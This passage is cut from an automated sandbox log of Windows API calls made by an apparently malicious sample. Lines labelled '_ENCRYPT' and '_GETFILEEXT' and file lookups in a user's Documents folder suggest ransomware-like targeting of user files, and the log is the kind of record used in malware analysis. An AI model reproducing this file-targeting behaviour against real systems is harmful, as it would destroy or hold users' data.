Size=0x10) returned 0x9bdae0 [0178.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.419] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.419] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.420] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0178.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd5a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.421] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0178.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.422] CloseHandle (hObject=0x138) returned 1 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.422] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.423] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0178.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0178.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0178.423] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0178.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.423] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0178.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.424] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0178.424] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0x90add8 [0178.426] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.426] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.426] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0x90add8 [0178.427] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0178.427] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.427] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 